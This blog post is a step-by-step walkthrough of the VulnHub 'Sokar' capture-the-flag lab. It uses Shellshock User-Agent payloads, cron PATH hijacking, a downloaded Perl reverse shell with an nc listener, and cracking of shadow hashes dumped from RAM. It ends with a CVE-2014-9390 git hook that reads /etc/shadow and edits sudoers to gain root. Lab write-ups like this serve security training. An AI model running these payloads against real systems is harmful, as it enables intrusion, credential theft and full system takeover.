piyr9 bio photo

piyr9

A Curious Mind with a Craving for Information to Life's many Problems.

Overview

Break out the Tylenol, you will need it

Sokar seems to block pings but if you scan individual ip’s it seems to work

Scaning the ports of sokar

	root@foxkali:~# nmap -sV -p- 192.168.219.138

	Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-31 16:22 EST
	Discovered open port 591/tcp on 192.168.219.138
	Completed SYN Stealth Scan at 16:43, 1271.78s elapsed (65535 total ports)
	Initiating Service scan at 16:43
	Scanning 1 service on 192.168.219.138
	Completed Service scan at 16:43, 6.06s elapsed (1 service on 1 host)
	NSE: Script scanning 192.168.219.138.
	NSE: Starting runlevel 1 (of 1) scan.
	Nmap scan report for 192.168.219.138
	Host is up (0.00032s latency).
	Scanned at 2015-01-31 16:22:10 EST for 1291s
	Not shown: 65534 filtered ports
	PORT    STATE SERVICE VERSION
	591/tcp open  http    Apache httpd 2.2.15 ((CentOS))
	MAC Address: 08:00:27:F2:40:DB (Cadmus Computer Systems)

	Read data files from: /usr/bin/../share/nmap
	Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 1291.01 seconds
	           Raw packets sent: 131076 (5.767MB) | Rcvd: 8 (336B)

Load the browser to http://192.168.219.138:591/ and see the sokar page

Bash Shellshock Exploit

I Realized the page is vulnerable to bash shellshock exploit Running the command it seems to be vulnerable to the shellshock exploit, and looking at the files in /var/spool/mail/bynarr we are able to aquire a password for the user bynarr and an outbound ephemeral port 51242

	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /var/spool/mail/bynarr" http://192.168.76.103:591/cgi-bin/cat

	Return-Path: <root@sokar>
	Delivered-To: bynarr@localhost
	Received:  from root by localhost
	To: <bynarr@sokar>
	Date: Thu, 13 Nov 2014 22:04:31 +0100
	Subject: Welcome

	Dear Bynarr.  Welcome to Sokar Inc. Forensic Development Team.
	A user account has been setup for you.

	UID 500 (bynarr)
	GID 500 (bynarr)
	    501 (forensic)

	Password 'fruity'.  Please change this ASAP.
	Should you require, you've been granted outbound ephemeral port access on 51242, to transfer non-sensitive forensic dumps out for analysis.

	All the best in your new role!
	
	  -Sokar-

Looking at the .bash_profile file of user bynarr we can see that the path includes ‘.’ which is /home/bynarr. But wait a minute, the website on sokar shows it running a few commands, looking at them you can tell these commands are the following: date, iostat, netstat, and uptime

Refresh the sokar page a few times and you can see that it only updates every minute on the minute. Only one cause of this, the crontab. What if one of the 4 commands executed there does not have a full path? then /home/bynarr/ would be run

Lets try it, with date first.

wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/bin/cat /home/bynarr/.bashrc'>/home/bynarr/date" http://192.168.76.103:591/cgi-bin/cat
wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/chmod 777 /home/bynarr/date" http://192.168.76.103:591/cgi-bin/cat

Sadly it didn’t work if you check the sokar website after it updated, you can see date command is still there, ok lets try iostat.

wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/bin/cat /home/bynarr/.bashrc'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat
wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/chmod 777 /home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat

Bingo! the sokar page refreshed and bynarr’s .bashrc was in plain view. (why did I use .bashrc? no reason it was the only file that was handy at the time) The page was seen as follows:

Wed Feb 4 04:21:02 GMT 2015
04:21:02 up 3:38, 0 users, load average: 0.00, 0.00, 0.00


Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State      
tcp        0      0 :::591                      :::*                        LISTEN      
tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53896 TIME_WAIT   
tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53900 TIME_WAIT   
tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53899 TIME_WAIT   
tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53898 TIME_WAIT   
tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53897 TIME_WAIT   
udp        0      0 0.0.0.0:68                  0.0.0.0:*                               
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     7331   @/com/ubuntu/upstart
unix  2      [ ]         DGRAM                    7474   @/org/kernel/udev/udevd
unix  4      [ ]         DGRAM                    8639   /dev/log
unix  2      [ ]         DGRAM                    9729   
unix  2      [ ]         DGRAM                    8819   
unix  3      [ ]         DGRAM                    7490   
unix  3      [ ]         DGRAM                    7489   

# .bashrc

# Source global definitions
if [ -f /etc/bashrc ]; then
	. /etc/bashrc
fi

# User specific aliases and functions

##Reverse Shell via Crontab Ok next we need to get a reverse shell in place. Checking sokar, it seems to have perl On Kali linux:

cd /var/www
cp /usr/share/webshells/perl/perl-reverse-shell.pl .

Change reverse shell script to your ip address and port 51242 in this case my ip address for kali is 192.168.76.102

Get ready to start httpd on Kali, but first we need to modify the port so user bynarr can get it on port 51242.

nano /etc/apache2/ports.conf
nano /etc/apache2/sites-available/default

So we changed the port from port 80 over to 51242 and we now start Apache2 on Kali

Next we run the shellshock exploit again this time picking up the reverse shell when the crontab runs

	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/usr/bin/wget 192.168.76.102:51242/perl-reverse-shell.pl -O /tmp/prshell.pl'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat

Check that its there

	root@fox-kali:~# wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/ls -ltra /tmp/*.pl" http://192.168.76.103:591/cgi-bin/cat
	--2015-02-07 23:54:43--  http://192.168.76.103:591/cgi-bin/cat
	Connecting to 192.168.76.103:591... connected.
	HTTP request sent, awaiting response... 200 OK
	Length: unspecified [text/plain]
	Saving to: `cat.43'

	    [ <=>                                                                                                                                        ] 119         --.-K/s   in 0.001s  

	2015-02-07 23:54:43 (179 KB/s) - `cat.43' saved [119]

	root@fox-kali:~# cat cat.43

	-rw-rw-r-- 1 bynarr bynarr 3718 Feb  8  2015 /tmp/prshell.pl

Ok awesome it picked it up and its on /tmp folder on sokar Next we fix up the permissions on the reverse shell

wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/bin/chmod 777 /tmp/prshell.pl'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat
wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/bin/ls -ltr /tmp/prshell.pl'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat
	-rwxrwxrwx 1 bynarr bynarr 3718 Feb  8  2015 /tmp/prshell.pl

Stop Apache2 server on Kali linux Fix up permissions on iostat and tell it to run the reverse shell command

wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/chmod 777 /home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat
wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/usr/bin/perl /tmp/prshell.pl'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat

Ok on the next Crontab run on sokar we will be able to get a reverse shell

	root@fox-kali:/var/www# nc -lvp 51242
	listening on [any] 51242 ...
	192.168.76.103: inverse host lookup failed: Unknown server error : Connection timed out
	connect to [192.168.76.102] from (UNKNOWN) [192.168.76.103] 48276
	 05:02:01 up  4:19,  0 users,  load average: 0.00, 0.00, 0.00
	USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
	Linux sokar 2.6.32-504.1.3.el6.x86_64 #1 SMP Tue Nov 11 17:57:25 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
	uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)
	/
	apache: cannot set terminal process group (-1): Invalid argument
	apache: no job control in this shell
	[bynarr@sokar /]$ id
	id
	uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)

Bingo! we are now user bynarr on sokar

##Memory Forensics The command sudo -l shows bynarr only as sudo access to the /home/bynarr/lime file. Well okay lets see what this file is.

Run lime as sudo

sudo /home/bynarr/lime
add

Ok it seems to have dumped the ram into /tmp/ram. Lets have a look see. It appears to be binary with some readable text, lets strip out the binary and see if we can read it. While grep’ing for user apophis and root, I came across these 2 strings that appear to be from /etc/shadow

strings /tmp/ram|grep "apophis"
	apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::
strings /tmp/ram|grep "root:"
	root:$6$cWQYjirZ$rADNjUFSiHmYp.UVdt4WYlmALhMXdkg9//9yuodQ2TFfiEWlAO0J6PRKesEfvu.3dfDb.7gTGgl/jesvFWs7l0:16434:0:99999:7:::

Next lets load up john the ripper so we can crack these hashes

	root@fox-kali:~# john --wordlist=/root/rockyou.txt sokar.db
	Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
	Use the "--format=crypt" option to force loading these as that type instead
	Loaded 2 password hashes with 2 different salts (sha512crypt [64/64])
	overdrive        (apophis)

Ok I left john to crack over night, seemed like it was able to crack apophis password but was unable to crack root.

Next we force shell to be interactive

[bynarr@sokar /]$ python -c 'import pty;pty.spawn("/bin/bash")'
[bynarr@sokar /]$ /bin/sh -i

And we change the user to apophis using overdrive as the password we got from john the ripper

sh-4.1$ su - apophis
Password: overdrive
	[apophis@sokar ~]$ id
	id
	uid=501(apophis) gid=502(apophis) groups=502(apophis)

Alright we are now user apophis, looking at the user’s home folder we can see there is an executable here

	[apophis@sokar ~]$ file build 
	file build
	build: setuid setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

Runing build executable

	[apophis@sokar ~]$ ./build
	./build
	Build? (Y/N) Y
	Y
	Cloning into '/mnt/secret-project'...
	ssh: Could not resolve hostname sokar-dev: Temporary failure in name resolution
	fatal: Could not read from remote repository.

	Please make sure you have the correct access rights
	and the repository exists.

Hmm…It seems to be looking for a host called sokar-dev. We tell sokar that sokar-dev is our Kali machine by starting a DNS server on Kali and tell sokar to point the nameserver to our ip address at 192.168.76.102

Editing /etc/resolv.conf

	echo "nameserver 192.168.76.102">/etc/resolv.conf

##Configure DNS on Kali Install and configure DNS server on Kali linux

apt-get install bind9
nano /etc/bind/named.conf.default-zones

Add the following lines to named.conf.default-zones

zone "sokar-dev" {
       	type master;
        file "/etc/bind/sokar-dev";
};

zone "192.in-addr.arpa" {
       	type master;
        file "/etc/bind/db.192";
};

Create 2 files with the following, one for forward and one for reverse, called sokar-dev and other db.192:

root@fox-kali:/etc/bind# cat sokar-dev
	;
	; BIND data file for local loopback interface
	;
	$TTL	604800
	@	IN	SOA	sokar-dev. root.sokar-dev. (
				      2		; Serial
				 604800		; Refresh
				  86400		; Retry
				2419200		; Expire
				 604800 )	; Negative Cache TTL
	;
	@	IN	NS	sokar-dev.
	@	IN	A	192.168.76.102
	@	IN	AAAA	::1

root@fox-kali:/etc/bind# cat db.192
	;
	; BIND reverse data file for local loopback interface
	;
	$TTL	604800
	@	IN	SOA	sokar-dev. root.sokar-dev. (
				      1		; Serial
				 604800		; Refresh
				  86400		; Retry
				2419200		; Expire
				 604800 )	; Negative Cache TTL
	;
	@	IN	NS	sokar-dev.
	102.76.168	IN	PTR	sokar-dev.

On Kali linux make the secret-project folder and git init to start the repository

mkdir /root/secret-project
cd /root/secret-project
git init secret-project

Running the build executable again after you remove it, clones the folder /root/secret-project from kali over to /mnt/secret-project on sokar. Interesting…

Lets check the version of git

	[apophis@sokar ~]$ git --version
	git --version
	git version 2.2.0

Some Googling it shows that this version is vulnerable to CVE-2014-9390 also known as the git exploit from OSX and Windows case insensitive .Git and .git folder names So as a result this can help us get root.

The mount command even shows that the /mnt folder is vfat aka fat32/fat16

	[apophis@sokar ~]$ mount
	mount
	/dev/sda1 on / type ext4 (rw)
	proc on /proc type proc (rw)
	sysfs on /sys type sysfs (rw)
	devpts on /dev/pts type devpts (rw,gid=5,mode=620)
	tmpfs on /dev/shm type tmpfs (rw)
	/dev/sdb1 on /mnt type vfat (rw,uid=501,gid=502)
	none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

On Kali lets go ahead and exploit this bug

cd /root/secret-project
mkdir .Git
cd .Git
mkdir hooks
cd hooks

Since the command post-checkout is executated after every clone we can use that here

	nano post-checkout

Lets execute some root commands and only root would be able to read a file like /etc/shadow

	#!/bin/sh
	/bin/cat /etc/shadow

Change the post-checkout to be executable and commit it

chmod +x post-checkout
cd ../..
git add .
git commit -m 'git exploit'

On sokar we remove the folder and run build again

rm -rf /mnt/secret-project
cd ~/

[apophis@sokar ~]$ ./build 
	./build
	Build? (Y/N) Y
	Y
	Cloning into '/mnt/secret-project'...
	root@sokar-dev's password: <redacted>

	remote: Counting objects: 14, done.        
	remote: Compressing objects: 100% (10/10), done.        
	remote: Total 14 (delta 1), reused 0 (delta 0)        
	Receiving objects: 100% (14/14), 14.17 KiB | 0 bytes/s, done.
	Resolving deltas: 100% (1/1), done.
	Checking connectivity... done.
	root:$6$cWQYjirZ$rADNjUFSiHmYp.UVdt4WYlmALhMXdkg9//9yuodQ2TFfiEWlAO0J6PRKesEfvu.3dfDb.7gTGgl/jesvFWs7l0:16434:0:99999:7:::
	bin:*:15628:0:99999:7:::
	daemon:*:15628:0:99999:7:::
	adm:*:15628:0:99999:7:::
	lp:*:15628:0:99999:7:::
	sync:*:15628:0:99999:7:::
	shutdown:*:15628:0:99999:7:::
	halt:*:15628:0:99999:7:::
	mail:*:15628:0:99999:7:::
	uucp:*:15628:0:99999:7:::
	operator:*:15628:0:99999:7:::
	games:*:15628:0:99999:7:::
	gopher:*:15628:0:99999:7:::
	ftp:*:15628:0:99999:7:::
	nobody:*:15628:0:99999:7:::
	vcsa:!!:16386::::::
	saslauth:!!:16386::::::
	postfix:!!:16386::::::
	sshd:!!:16386::::::
	bynarr:$6$UVZfMym7$9FFtl9Ky3ABFGErQlpQsKNOmAycJn4MlSRVHsSgVupDstQOifqqu3LvGwf3wmBvmfvh0IslwMo4/mhZ3qnVrM/:16434:0:99999:7:::
	apache:!!:16386::::::
	apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::

Awesome! we can see /etc/shadow and be able to execute commands as root now lets see if we can elevate

On Kali we modify the post-checkout file again and this time we add apophis to /etc/sudoers as a root user

	root@fox-kali:~/secret-project/.Git/hooks# nano post-checkout 

Adding this to post-checkout

	#!/bin/sh
	echo "apophis	ALL=(ALL) 	ALL" >> /etc/sudoers

Git commit again

	git commit post-checkout

Remove the folder and run build again

[apophis@sokar ~]$ rm -rf /mnt/secret-project
[apophis@sokar ~]$ ./build

Home stretch

Lets try root escalation

[apophis@sokar ~]$ sudo /bin/bash
sudo /bin/bash
[root@sokar apophis]# id
id
uid=0(root) gid=0(root) groups=0(root)

Bingo!

[root@sokar apophis]# cd /root
[root@sokar ~]# cat flag	
cat flag 
	                0   0
	                |   |
	            ____|___|____
	         0  |~ ~ ~ ~ ~ ~|   0
	         |  |   Happy   |   |
	      ___|__|___________|___|__
	      |/\/\/\/\/\/\/\/\/\/\/\/|
	  0   |    B i r t h d a y    |   0
	  |   |/\/\/\/\/\/\/\/\/\/\/\/|   |
	 _|___|_______________________|___|__
	|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
	|                                   |
	|     V  u  l  n  H  u  b   ! !     |
	| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
	|___________________________________|
	
	=====================================
	| Congratulations on beating Sokar! |
	|                                   |
	|  Massive shoutout to g0tmi1k and  |
	| the entire community which makes  |
	|         VulnHub possible!         |
	|                                   |
	|    rasta_mouse (@_RastaMouse)     |
	=====================================